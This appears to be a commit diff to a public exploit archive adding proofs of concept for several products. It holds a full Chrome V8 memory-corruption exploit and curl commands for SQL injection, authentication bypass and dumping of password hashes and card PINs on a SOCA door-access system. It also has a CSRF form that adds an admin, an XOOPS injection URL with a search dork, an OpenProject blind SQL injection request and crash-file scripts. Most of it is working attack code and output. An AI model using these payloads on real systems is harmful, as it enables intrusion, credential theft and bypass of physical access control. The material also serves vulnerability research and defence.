DB: 2019-05-14

10 changes to exploits/shellcodes

SpotMSN 2.4.6 - Denial of Service (PoC)
DNSS 2.1.8 - Denial of Service (PoC)
Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write

TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery
Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery
SOCA Access Control System 180612 - Information Disclosure
SOCA Access Control System 180612 - SQL Injection
SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)
XOOPS 2.5.9 - SQL Injection
OpenProject 5.0.0 - 8.3.1 - SQL Injection

Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)

exploits/multiple/dos/46837.html

@@ -0,0 +1,242 @@
+<!--
+Since commit https://chromium.googlesource.com/v8/v8.git/+/c22bb466d8934685d897708119543d099b9d2a9a turbofan supports inlining calls to array.includes and array.indexOf. The logic of the function is roughly:
+
+1. Check the set of possible Maps of the array type (with NodeProperties::InferReceiverMaps).
+2. If they are all fast arrays, find the correct CSA builtin to handle the fast path (`Callable const callable = search_variant == SearchVariant::kIndexOf ? GetCallableForArrayIndexOf(kind, isolate()) : GetCallableForArrayIncludes(kind, isolate());`).
+3. Load the array length and call the builtin. The builtin will assume that the array is a FastArray with packed (dense) elements and directly search linearly through the backing memory.
+
+The issue here is that NodeProperties::InferReceiverMaps doesn't necessarily guarantee that the object will always have the inferred Map. In case it can't prove that the objects will always have the inferred Maps it will return kUnreliableReceiverMaps:
+
+    // Walks up the {effect} chain to find a witness that provides map
+    // information about the {receiver}. Can look through potentially
+    // side effecting nodes.
+    enum InferReceiverMapsResult {
+      kNoReceiverMaps,         // No receiver maps inferred.
+      kReliableReceiverMaps,   // Receiver maps can be trusted.
+      kUnreliableReceiverMaps  // Receiver maps might have changed (side-effect),
+                                                  // but instance type is reliable.
+    };
+    static InferReceiverMapsResult InferReceiverMaps(
+        JSHeapBroker* broker, Node* receiver, Node* effect,
+        ZoneHandleSet<Map>* maps_return);
+
+In which case the caller is responsible for guarding any optimizations based on the inferred Maps (e.g. by adding MapChecks). However, in this case the calling function fails to do so. As such, if the array is changed to dictionary mode before the inlined function call, the CSA builtin will read data out-of-bounds.
+
+The following sample, found through fuzzing, triggers this case: 
+
+    function v7(v8,v11) {
+        function v14(v15,v16) { }
+        // Transition to dictionary mode in the final invocation.
+        const v17 = v11.__defineSetter__(v8, v14);
+        // Will then read OOB.
+        const v18 = v11.includes(1234);
+        return v18;
+    }
+    v7([], []);
+    v7([], []);
+    %OptimizeFunctionOnNextCall(v7);
+    v7([], []);
+
+    const v57 = v7(String(0x1000000), []);
+
+Note: the commit introducing this vulnerability does not appear to be included in the stable Chrome release yet.
+-->
+
+<script>
+var conv_ab = new ArrayBuffer(8);
+var conv_f64 = new Float64Array(conv_ab);
+var conv_u64 = new BigUint64Array(conv_ab);
+BigInt.prototype.to_float = function() {
+  conv_u64[0] = this;
+  return conv_f64[0];
+};
+BigInt.prototype.hex = function() {
+  return '0x'+this.toString(16);
+};
+Number.prototype.to_int = function() {
+  conv_f64[0] = this;
+  return conv_u64[0];
+}
+Number.prototype.hex = function() {
+  return this.to_int().hex();
+}
+
+let ab = undefined;
+
+function leak(i, smi_arr, float_arr) {
+  let high_bytes = 0;
+  smi_arr.__defineSetter__(i, ()=>{});
+  ab = new ArrayBuffer(2<<26);
+  let smi_boundary = [1, 1, 1, 1];
+  for (high_bytes = 0; high_bytes < 0xffff; high_bytes++) {
+    smi_boundary[0] = high_bytes;
+    let idx = smi_arr.indexOf(high_bytes, 20);
+    if (idx == 20) {
+      break;
+    }
+  }
+
+  float_arr.__defineSetter__(i, ()=>{});
+  let tmp = new Uint32Array(ab);
+  let float_boundary = [1.1, 1.1, 1.1, 1.1];
+
+  let start = (BigInt(high_bytes)<<32n).to_float();
+  let end = ((BigInt(high_bytes)<<32n)+0x1000000n).to_float();
+  let step = 0x1000n.to_float();
+
+  for (let j = start; j < end; j += step) {
+    float_boundary[0] = j;
+    if (float_arr.indexOf(j, 30) == 30) {
+      return [j, smi_boundary, float_boundary, tmp];
+    }
+  }
+}
+
+for (let i = 0; i < 10; i++) {
+  leak('', [1], [1.1]);
+}
+
+let res = leak('100000', [1], [1.1]);
+if (res == undefined) {
+  location.reload();
+  return;
+}
+let ab_addr = res[0].to_int();
+
+console.log(`Buf at ${ab_addr.hex()}`);
+
+let u64 = new BigUint64Array(ab);
+
+function write_map(offset, type) {
+  u64[offset/8n + 0x0n] = 0x12345n;
+  u64[offset/8n + 0x1n] = 0x190000002900a804n | (type << 32n);
+  u64[offset/8n + 0x2n] = 0x92003ffn;  // bitfield 3
+  u64[offset/8n + 0x3n] = 0x41414141n; // prototype
+  u64[offset/8n + 0x4n] = 0x41414141n; // constructor or back ptr
+  u64[offset/8n + 0x5n] = 0n;          // transistions or proto info
+  u64[offset/8n + 0x6n] = 0x41414141n; // instance descriptors
+  u64[offset/8n + 0x7n] = 0n;          // layout descriptor
+  u64[offset/8n + 0x8n] = 0x41414141n; // dependent code
+  u64[offset/8n + 0x9n] = 0n;          // prototype validity cell
+}
+
+// SPACE_SIZE = 1<<18
+// LARGE_OBJ_SIZE = (1<<17) +1
+
+const SPACE_SIZE = 1n<<19n;
+const SPACE_MASK = 0xffffffffffffffffn ^ (SPACE_SIZE-1n);
+
+let space_start_addr = (ab_addr & SPACE_MASK) + SPACE_SIZE;
+let space_start_off = space_start_addr - ab_addr;
+
+console.log(`Space start: ${space_start_addr.hex()}`);
+
+let free_mem = space_start_addr + 4096n;
+
+function page_round(addr) {
+  if ((addr & 0xfffn) == 0n) {
+    return addr;
+  }
+  return (addr + 0x1000n) & 0xfffffffffffff000n;
+}
+
+function u64_offset(addr) {
+  return (addr - ab_addr) / 8n;
+}
+
+class V8String {
+  constructor(type, data) {
+    let size = BigInt(data.length)*8n;
+    this.addr = free_mem;
+    free_mem += page_round(size);
+    this.map = free_mem;
+    free_mem += page_round(0x9n*8n);
+    this.off = u64_offset(this.addr);
+    u64[this.off] = this.map|1n;
+    for (let i = 0n; i < data.length; i++) {
+      u64[this.off + 1n + i] = data[i];
+    }
+    let map_off = u64_offset(this.map);
+    u64[map_off + 0x0n] = 0x12345n;
+    u64[map_off + 0x1n] = 0x190000002900a804n | (type << 32n);
+    u64[map_off + 0x2n] = 0x92003ffn;  // bitfield 3
+    u64[map_off + 0x3n] = 0x41414141n; // prototype
+    u64[map_off + 0x4n] = 0x41414141n; // constructor or back ptr
+    u64[map_off + 0x5n] = 0n;          // transistions or proto info
+    u64[map_off + 0x6n] = 0x41414141n; // instance descriptors
+    u64[map_off + 0x7n] = 0n;          // layout descriptor
+    u64[map_off + 0x8n] = 0x41414141n; // dependent code
+    u64[map_off + 0x9n] = 0n;          // prototype validity cell
+  }
+}
+
+class ConsString extends V8String {
+  constructor(size, left, right) {
+    super(0x29n, [(size<<32n) | 0x00000003n, left|1n, right|1n]);
+  }
+}
+
+class SliceString extends V8String {
+  constructor(parent_string, offset, len=0x100n) {
+    super(0x2bn, [(len<<32n) | 0x00000003n, parent_string|1n, offset<<32n]);
+  }
+}
+
+class SeqString extends V8String {
+  constructor(data) {
+    super(0x08n, [(BigInt(data.length*8) << 32n | 0xdf61f02en)].concat(data));
+  }
+}
+
+// object in young generation == space+8 has one of these bits set: 0x18
+u64[space_start_off/8n + 0x1n] = 0x18n;
+
+LEAK_STRING_SZ = 0x1;
+
+let seq_string = new SeqString([0x4141414141414141n]);
+let root_string = new ConsString(BigInt(LEAK_STRING_SZ), seq_string.addr, seq_string.addr);
+
+function foo(i, arr, to_search, to_copy) {
+  arr.__defineSetter__(i, ()=>{});
+  let a = [1.1, to_copy];
+  let boundary = [to_search];
+  return [arr.indexOf(to_search), a, boundary];
+}
+
+for (let i = 0; i < 100000; i++) {
+  foo('', [Array], '', 1.1);
+}
+
+function doit(to_search, to_copy) {
+  return foo('100000', [Array], to_search, to_copy)[0];
+}
+
+doit('A'.repeat(LEAK_STRING_SZ), (root_string.addr|1n).to_float());
+let corrupted_array = [1.1, 1.2, 1.3];
+
+console.log(`string at = ${u64[root_string.off+2n].hex()}`);
+
+let corrupted_array_addr = u64[root_string.off+2n]+0x40n;
+let backing_store_sz_addr = corrupted_array_addr + 0x38n;
+
+
+GC_STRING_SZ = 0x30000000;
+
+u64[space_start_off/8n + 0x0n] = 0x1234n;
+// object in young generation == space+8 has one of these bits set: 0x18
+u64[space_start_off/8n + 0x1n] = 0xff000n;
+// marking bitmap pointer
+u64[space_start_off/8n + 0x2n] = backing_store_sz_addr + 4n - (0x70n*0x4n);
+u64[space_start_off/8n + 0x6n] = space_start_addr;
+// incremental_marking ptr
+u64[space_start_off/8n + 0xf7n] = space_start_addr;
+
+seq_string = new SeqString([0x4141414141414141n]);
+root_string = new ConsString(BigInt(GC_STRING_SZ), seq_string.addr, seq_string.addr);
+doit('A'.repeat(GC_STRING_SZ), (root_string.addr|1n).to_float());
+corrupted_array[100] = 1.1;
+console.log('=== OOB array leak ===');
+for (let i = 0; i < 100; i++) {
+  console.log(corrupted_array[i].hex());
+}
+</script>

exploits/multiple/webapps/46820.txt

@@ -1,4 +1,4 @@
-# Exploit Title: SSRF in TheHive Project Cortex <= 2.1.3
+# Exploit Title: Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery
 # Date: 2/26/2019
 # Exploit Author: Alexandre Basquin
 # Vendor Homepage: https://blog.thehive-project.org
@@ -9,12 +9,7 @@
 
 # Exploit description
 
-TheHive Project Cortex version <= 2.1.3 is vulnerable to a SSRF vulnerability in the "UnshortenLink_1_0" analyzer.
-
-References:
-
-https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
-
+The "UnshortenLink_1_0" analyzer used by Cortex contains an SSRF vulnerability 
 
 
 POC:
@@ -28,4 +23,10 @@ POC:
 4. Result can be seen in the main dashboard.
 
 
-Reported to TheHive Project by Alexandre Basquin on 1/24/2019
+Reported to TheHive Project by Alexandre Basquin on 1/24/2019
+
+The issue has been fixed in UnshortenLink 1.1 released within Cortex-analyzers 1.15.2
+
+References:
+
+https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/

exploits/php/webapps/46832.txt

@@ -0,0 +1,92 @@
+SOCA Access Control System 180612 Information Disclosure
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include proximity and fingerprint access
+control system, time and attendance, electric locks, card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: Insecure direct object references occur when an application provides
+direct access to objects based on user-supplied input. As a result of this
+vulnerability attackers can bypass authorization and access resources and
+functionalities in the system.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+           Apache/2.2.22 (Win32)
+           PHP/5.4.13
+           Firebird/InterBase DBMS
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5517
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php
+
+
+20.04.2018
+
+--
+
+
+Authenticated users password hash disclosure via Get_Permissions_From_DB.php:
+-----------------------------------------------------------------------------
+
+# curl -s http://10.0.0.3/Permission/Get_Permission_From_DB.php -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+[{"Idx":1,"Id":"USER","Password":"4a7d1ed414474e4033ac29ccb8653d9b","Access":"ffffff00ff00ffffff00"},{"Idx":2,"Id":"soca","Password":"3c0d71fab22bc8703324e06d59a81700","Access":"ffffff00ff00ffffff00"}]
+
+
+Unauthenticated users passwords (pins) disclosure via Ac10_ReadSortCard:
+------------------------------------------------------------------------
+
+# curl -X POST http://10.0.0.3/cgi-bin/Reader_Action.cgi/Ac10_ReadSortCard --data "Reader=%7B%22Idx%22%3A5%2C%22Model%22%3A502%2C%22Comm%22%3A%22TCP%2C10.0.0.3%2C4444%22%2C%22Timeout%22%3A1%2C%22SubNames%22%3A%7B%221%22%3A%22%22%2C%222%22%3A%22%22%2C%223%22%3A%22%22%2C%224%22%3A%22%22%2C%225%22%3A%22%22%2C%226%22%3A%22%22%2C%227%22%3A%22%22%2C%228%22%3A%22%22%7D%2C%22CreateTime%22%3A%222016-04-28+15%3A57%3A31%22%2C%22EditTime%22%3A%222018-12-26+17%3A14%3A37%22%2C%22Polling%22%3A1%2C%22Done%22%3Afalse%7D&Section=17" -s |grep Password |lolcat
+
+{"cmd":"readcard","success":true,"Reader":{"Idx":5,"Model":502,"SubNames":
+{"8":"","7":"","6":"","5":"","4":"","3":"","2":"","1":""},"No":1,"Polling":
+1,"EditTime":"2018-12-26 17:14:37","Name":"READER017","Done":false,"Comm":"TCP,10.0.0.3,4444",
+"Timeout":1,"CreateTime":"2016-04-28 15:57:31"},"Section":17,"Cards":[
+{"Card":"3758236739","Password":"0000","Timezone":"1"},{"Card":"3758294894","Password":"0000","Timezone":"1"},
+{"Card":"3758393748","Password":"0000","Timezone":"1"},{"Card":"3758397434","Password":"0000","Timezone":"1"},
+{"Card":"3758526944","Password":"0000","Timezone":"1"},{"Card":"3758556239","Password":"0000","Timezone":"1"},
+{"Card":"3759183323","Password":"0000","Timezone":"1"},{"Card":"3759289453","Password":"0000","Timezone":"1"},
+{"Card":"3759444892","Password":"0000","Timezone":"1"},{"Card":"3759608121","Password":"0000","Timezone":"1"},
+{"Card":"3759700024","Password":"0000","Timezone":"1"},{"Card":"3760195859","Password":"0000","Timezone":"1"},
+{"Card":"3760330834","Password":"0000","Timezone":"1"},{"Card":"3760455789","Password":"0000","Timezone":"1"},
+{"Card":"3760493498","Password":"0000","Timezone":"1"},{"Card":"3760555917","Password":"0000","Timezone":"1"},
+{"Card":"3760674062","Password":"0000","Timezone":"1"},{"Card":"3761256706","Password":"0000","Timezone":"1"},
+{"Card":"3761275358","Password":"0000","Timezone":"1"},{"Card":"3761386285","Password":"0000","Timezone":"1"},
+{"Card":"3761398620","Password":"0000","Timezone":"1"},{"Card":"3761452653","Password":"0000","Timezone":"1"},
+{"Card":"3761514319","Password":"0000","Timezone":"1"},{"Card":"3761543092","Password":"0000","Timezone":"1"},
+{"Card":"3761766657","Password":"0000","Timezone":"1"},{"Card":"3761783860","Password":"0000","Timezone":"1"},
+{"Card":"3762311449","Password":"0000","Timezone":"1"},{"Card":"3762313335","Password":"0000","Timezone":"1"},
+{"Card":"3762328203","Password":"0000","Timezone":"1"},{"Card":"3762384973","Password":"0000","Timezone":"1"},
+{"Card":"3762647673","Password":"0000","Timezone":"1"},{"Card":"3762688310","Password":"0000","Timezone":"1"},
+{"Card":"3762771467","Password":"0000","Timezone":"1"},{"Card":"3762827566","Password":"0000","Timezone":"1"},
+{"Card":"3762843960","Password":"0000","Timezone":"1"},{"Card":"3762910530","Password":"0000","Timezone":"1"},
+{"Card":"3763344650","Password":"0000","Timezone":"1"},{"Card":"3763417869","Password":"0000","Timezone":"1"},
+{"Card":"3763492897","Password":"0000","Timezone":"1"},{"Card":"3763734440","Password":"0000","Timezone":"1"},
+{"Card":"3763865189","Password":"0000","Timezone":"1"},{"Card":"3763889211","Password":"0000","Timezone":"1"},
+{"Card":"3764619719","Password":"0000","Timezone":"1"},{"Card":"3764811544","Password":"0000","Timezone":"1"},
+{"Card":"3764846862","Password":"0000","Timezone":"1"},{"Card":"3765568542","Password":"0000","Timezone":"1"},
+{"Card":"3765790491","Password":"0000","Timezone":"1"},{"Card":"3765917518","Password":"0000","Timezone":"1"},
+{"Card":"3765962614","Password":"0000","Timezone":"1"},{"Card":"3765978672","Password":"0000","Timezone":"1"},
+{"Card":"3766032648","Password":"0000","Timezone":"1"},{"Card":"3766498811","Password":"0000","Timezone":"1"},
+{"Card":"3766625241","Password":"0000","Timezone":"1"},{"Card":"3766970803","Password":"0000","Timezone":"1"},
+{"Card":"3767105946","Password":"0000","Timezone":"1"},{"Card":"3767601584","Password":"0000","Timezone":"1"},
+...
+...
+...
+
+
+phpinfo() disclosure:
+---------------------
+
+# curl -s http://10.0.0.3/phpinfo.php

exploits/php/webapps/46833.txt

@@ -0,0 +1,137 @@
+SOCA Access Control System 180612 SQL Injection And Authentication Bypass
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include proximity and fingerprint access
+control system, time and attendance, electric locks, card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: The Soca web access control system suffers from multiple SQL Injection
+vulnerabilities. Input passed via multiple POST parameters is not properly
+sanitised before being returned to the user or used in SQL queries. This
+can be exploited to manipulate SQL queries by injecting arbitrary SQL code
+and bypass the authentication mechanism. It allows the attacker to remotely
+disclose password hashes and login with MD5 hash with highest privileges 
+resulting in unlocking doors and bypass the physical access control in place.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+           Apache/2.2.22 (Win32)
+           PHP/5.4.13
+           Firebird/InterBase DBMS
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5519
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php
+
+
+20.04.2018
+
+--
+
+
+Authentication bypass / SQL injection via pos_id POST parameter in Login.php:
+-----------------------------------------------------------------------------
+-version 141007
+
+# curl -X POST --data "pos_id=' or 1=1--&pos_pw=whatever&Lang=eng" -i\
+"http://10.0.0.4/Login/Login.php"
+
+HTTP/1.1 200 OK
+Date: Fri, 03 May 2018 13:37:25 GMT
+Server: Apache/2.2.22 (Win32) PHP/5.4.13
+X-Powered-By: PHP/5.4.13
+Set-Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 5
+Content-Type: text/html
+
+ true
+
+
+Authentication bypass / SQL injection via ID POST parameter in Login.php:
+=========================================================================
+-version 180612
+
+# curl -X POST --data "ID=' or 1=1--&PW=whatever&Lang=eng"\
+"http://10.0.0.3/Login/Login.php"
+
+{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"' or 1=1--","sess_passwd":"008c5926ca861023c1d2a36653fd88e2","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
+
+
+Authenticated SQL injection via cidx POST parameter in Card_Edit_GetJson.php:
+=============================================================================
+
+Dump current user:
+------------------
+
+# curl -X POST --data "cidx=144 and 1=(user)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "SYSDBA";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump table:
+-----------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "USERS";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump column:
+------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields))"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "U_NAME";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump column:
+------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+56+distinct+rdb$relation_name+from+rdb$relation_fields))"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "U_PASSWORD";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump username and Idx from USERS table:
+---------------------------------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_NAME || U_IDX+from+USERS)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "USER1";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+Dump passwords from UAC table:
+------------------------------
+
+# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_PASSWORD+from+UAC)"\
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
+-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
+
+Warning:  ibase_fetch_assoc(): conversion error from string "4a7d1ed414474e4033ac29ccb8653d9b";  in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
+
+
+Login with MD5:
+===============
+
+# curl -X POST --data "ID=USER&PW=4a7d1ed414474e4033ac29ccb8653d9b&Lang=eng"
+"http://10.0.0.3/Login/Login.php"\
+
+{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"USER","sess_passwd":"4a7d1ed414474e4033ac29ccb8653d9b","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}

exploits/php/webapps/46834.txt

@@ -0,0 +1,46 @@
+SOCA Access Control System 180612 CSRF Add Admin Exploit
+
+
+Vendor: SOCA Technology Co., Ltd
+Product web page: http://www.socatech.com
+Affected version: 180612, 170000 and 141007
+
+Summary: The company's products include Proximity and Fingerprint access
+control system, Time and Attendance, Electric Locks, Card reader and writer,
+keyless entry system and other 30 specialized products. All products are
+attractively designed with advanced technology in accordance with users'
+safety and convenience which also fitted international standard.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
+           Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
+           Apache/2.2.22 (Win32)
+           PHP/5.4.13
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5520
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php
+
+
+20.04.2018
+
+--
+
+
+<html>
+  <body>
+  <script>history.pushState('', 'shpa', '/index-pc.php')</script>
+    <form action="http://10.0.0.3/Permission/Insert_Permission.php" method="POST">
+      <input type="hidden" name="Permission" value='{"Idx":null,"Id":"Imposter","Password":"123456","Access":"ffffff00ff00ffffff00"}' />
+      <input type="submit" value="Forge!" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/46835.txt

@@ -0,0 +1,24 @@
+[+] Sql Injection on XOOPS CMS v.2.5.9
+
+[+] Date: 12/05/2019
+
+[+] Risk: High
+
+[+] CWE Number : CWE-89
+
+[+] Author: Felipe Andrian Peixoto
+
+[+] Vendor Homepage: https://xoops.org/
+
+[+] Contact: felipe_andrian@hotmail.com
+
+[+] Tested on: Windows 7 and Gnu/Linux
+
+[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)
+
+[+] Exploit : 
+
+        http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]
+
+   
+[+] EOF

exploits/php/webapps/46838.txt

@@ -0,0 +1,118 @@
+SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
+=======================================================================
+              title: Unauthenticated SQL Injection vulnerability
+            product: OpenProject
+ vulnerable version: 5.0.0 - 8.3.1
+      fixed version: 8.3.2 & 9.0.0
+         CVE number: CVE-2019-11600
+             impact: Critical
+           homepage: https://www.openproject.org
+              found: 2019-04-17
+                 by: T. Soo (Office Bangkok)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Europe | Asia | North America
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"OpenProject is the leading open source project management software.
+Support your project management process along the entire project
+life cycle: From project initiation to closure."
+
+Source: https://www.openproject.org/
+
+
+Business recommendation:
+------------------------
+The vendor provides a patch which should be applied immediately.
+
+An in-depth security analysis performed by security professionals is
+highly advised, as the software may be affected from further security issues.
+
+
+Vulnerability overview/description:
+-----------------------------------
+An SQL injection vulnerability has been identified in the web "activities API".
+An unauthenticated attacker could successfully perform an attack to extract
+potentially sensitive information from the database if OpenProject is configured
+not to require authentication for API access.
+
+
+Proof of concept:
+-----------------
+Requesting the following URL will trigger a time delay as a proof of concept
+for exploiting the blind SQL injection:
+http://<host>/api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerability has been identified in OpenProject version 8.3.1 which
+was the most current version at the time of discovery.
+
+According to the vendor all versions between 5.0.0 and 8.3.1 are affected.
+Older versions (< 5.0.0) are not vulnerable.
+
+
+Vendor contact timeline:
+------------------------
+2019-04-30: Contacting vendor through security@openproject.com
+2019-04-30: A patch is published in version 8.3.2
+2019-05-06: Vendor publishes further details
+2019-05-10: Release of security advisory
+
+
+Solution:
+---------
+The vendor provides a patched version 8.3.2 and a security notice with further
+information:
+
+https://www.openproject.org/release-notes/openproject-8-3-2
+https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Europe | Asia | North America
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Thanaphon Soo / @2019

exploits/windows/dos/46830.py

@@ -0,0 +1,22 @@
+#Exploit Title: SpotMSN 2.4.6 - 'Name/Key' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-12
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/spotmsn_setup.exe
+#Tested Version: 2.4.6
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: SpotMSN_2.4.6.py
+#2.- Open SpotMSN.txt and copy content to clipboard
+#3.- Open SpotMSN
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name/Key" paste Clipboard
+#6.- Click "Ok"
+#7.- Crarshed
+ 
+cod = "\x41" * 300
+ 
+f = open('SpotMSN.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows/dos/46831.py

@@ -0,0 +1,22 @@
+#Exploit Title: DNSS Domain Name Search Software 2.1.8 -  Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-12
+#Vendor Homepage: www.nsauditor.com 
+#Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
+#Tested Version: 2.1.8
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: DNSS_2.1.8.py
+#2.- Open DNSS.txt and copy content to clipboard
+#3.- Open Dnss
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name/Key" paste Clipboard
+#6.- Click "Ok"
+#7.- Crarshed
+ 
+cod = "\x41" * 300
+ 
+f = open('DNSS.txt', 'w')
+f.write(cod)
+f.close()

files_exploits.csv

